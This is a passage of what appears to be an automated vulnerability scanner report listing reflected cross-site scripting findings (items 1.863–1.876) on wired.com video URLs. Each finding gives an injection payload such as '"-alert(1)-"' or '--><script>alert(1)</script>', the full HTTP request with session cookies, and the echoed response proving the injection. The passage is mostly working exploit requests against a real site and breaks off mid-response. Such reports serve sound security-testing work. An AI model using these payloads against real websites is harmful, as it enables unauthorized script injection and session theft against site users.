<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_behind-the-scenes-disney-epic-mickey-video-gameab0ae"><a>c48df1a3910 c_625093660001">
...[SNIP]...

1.863. http://www.wired.com/video/behind-the-scenes-disney-epic-mickey-video-game/625093660001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/behind-the-scenes-disney-epic-mickey-video-game/625093660001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cf33"><a>a6ba26af663 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/behind-the-scenes-disney-epic-mickey-video-game/6250936600019cf33"><a>a6ba26af663 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=274
Expires: Mon, 22 Nov 2010 00:58:24 GMT
Date: Mon, 22 Nov 2010 00:53:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106765


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_behind-the-scenes-disney-epic-mickey-video-game c_6250936600019cf33"><a>a6ba26af663">
...[SNIP]...

1.864. http://www.wired.com/video/behind-the-scenes-disney-epic-mickey-video-game/625093660001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/behind-the-scenes-disney-epic-mickey-video-game/625093660001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 658e0"-alert(1)-"b69aaac7020 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/behind-the-scenes-disney-epic-mickey-video-game/625093660001658e0"-alert(1)-"b69aaac7020 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:59:48 GMT
Date: Mon, 22 Nov 2010 00:54:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106733


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "625093660001658e0"-alert(1)-"b69aaac7020","behind-the-scenes-disney-epic-mickey-video-game","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.865. http://www.wired.com/video/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/behind-the-scenes-doctor-who-the-hungry-earth/664817239001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 7497c--><script>alert(1)</script>b5e658dbc0e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /video7497c--><script>alert(1)</script>b5e658dbc0e/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29479
Vary: Accept-Encoding
Cache-Control: max-age=297
Expires: Mon, 22 Nov 2010 00:57:54 GMT
Date: Mon, 22 Nov 2010 00:52:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /video7497c--><script>alert(1)</script>b5e658dbc0e/behind-the-scenes-doctor-who-the-hungry-earth/664817239001
-->
...[SNIP]...

1.866. http://www.wired.com/video/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/behind-the-scenes-doctor-who-the-hungry-earth/664817239001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23bbc"><a>8ef2b5259b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video23bbc"><a>8ef2b5259b3/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29446
Vary: Accept-Encoding
Cache-Control: max-age=288
Expires: Mon, 22 Nov 2010 00:56:59 GMT
Date: Mon, 22 Nov 2010 00:52:11 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_video23bbc"><a>8ef2b5259b3 ss_behind-the-scenes-doctor-who-the-hungry-earth c_664817239001">
...[SNIP]...

1.867. http://www.wired.com/video/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/behind-the-scenes-doctor-who-the-hungry-earth/664817239001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84cbf"-alert(1)-"407319541ef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/behind-the-scenes-doctor-who-the-hungry-earth84cbf"-alert(1)-"407319541ef/664817239001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:59:09 GMT
Date: Mon, 22 Nov 2010 00:54:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106729


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "behind-the-scenes-doctor-who-the-hungry-earth84cbf"-alert(1)-"407319541ef","664817239001","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.868. http://www.wired.com/video/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/behind-the-scenes-doctor-who-the-hungry-earth/664817239001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 831a3"><a>e6926060861 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/behind-the-scenes-doctor-who-the-hungry-earth831a3"><a>e6926060861/664817239001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=287
Expires: Mon, 22 Nov 2010 00:57:56 GMT
Date: Mon, 22 Nov 2010 00:53:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106786


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_behind-the-scenes-doctor-who-the-hungry-earth831a3"><a>e6926060861 c_664817239001">
...[SNIP]...

1.869. http://www.wired.com/video/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/behind-the-scenes-doctor-who-the-hungry-earth/664817239001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 283f1"-alert(1)-"762e65a9c8a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/behind-the-scenes-doctor-who-the-hungry-earth/664817239001283f1"-alert(1)-"762e65a9c8a HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 01:00:03 GMT
Date: Mon, 22 Nov 2010 00:55:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106800


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "behind-the-scenes-doctor-who-the-hungry-earth","664817239001283f1"-alert(1)-"762e65a9c8a","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.870. http://www.wired.com/video/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/behind-the-scenes-doctor-who-the-hungry-earth/664817239001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b0a3"><a>29a45465649 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/behind-the-scenes-doctor-who-the-hungry-earth/6648172390016b0a3"><a>29a45465649 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:59:12 GMT
Date: Mon, 22 Nov 2010 00:54:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106761


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_behind-the-scenes-doctor-who-the-hungry-earth c_6648172390016b0a3"><a>29a45465649">
...[SNIP]...

1.871. http://www.wired.com/video/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload a69b9--><script>alert(1)</script>9b884715abb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /videoa69b9--><script>alert(1)</script>9b884715abb/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29503
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:57:45 GMT
Date: Mon, 22 Nov 2010 00:52:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /videoa69b9--><script>alert(1)</script>9b884715abb/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001
-->
...[SNIP]...

1.872. http://www.wired.com/video/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f0b7"><a>e66b21fed8c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video2f0b7"><a>e66b21fed8c/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29470
Vary: Accept-Encoding
Cache-Control: max-age=282
Expires: Mon, 22 Nov 2010 00:56:39 GMT
Date: Mon, 22 Nov 2010 00:51:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_video2f0b7"><a>e66b21fed8c ss_behind-the-scenes-of-harry-potter-and-the-deathly-hallows c_650875857001">
...[SNIP]...

1.873. http://www.wired.com/video/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2695a"-alert(1)-"4170dfbb3c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/behind-the-scenes-of-harry-potter-and-the-deathly-hallows2695a"-alert(1)-"4170dfbb3c/650875857001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:58:47 GMT
Date: Mon, 22 Nov 2010 00:53:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106812


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "650875857001","behind-the-scenes-of-harry-potter-and-the-deathly-hallows2695a"-alert(1)-"4170dfbb3c","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.874. http://www.wired.com/video/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff018"><a>b757ef44c69 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/behind-the-scenes-of-harry-potter-and-the-deathly-hallowsff018"><a>b757ef44c69/650875857001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:57:48 GMT
Date: Mon, 22 Nov 2010 00:52:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106785


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_behind-the-scenes-of-harry-potter-and-the-deathly-hallowsff018"><a>b757ef44c69 c_650875857001">
...[SNIP]...

1.875. http://www.wired.com/video/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc05a"-alert(1)-"06ca3db5bf4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001cc05a"-alert(1)-"06ca3db5bf4 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=289
Expires: Mon, 22 Nov 2010 00:59:39 GMT
Date: Mon, 22 Nov 2010 00:54:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106824


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "behind-the-scenes-of-harry-potter-and-the-deathly-hallows","video","650875857001cc05a"-alert(1)-"06ca3db5bf4"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.876. http://www.wired.com/video/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e069"><a>59655ba9969 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/6508758570014e069"><a>59655ba9969 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
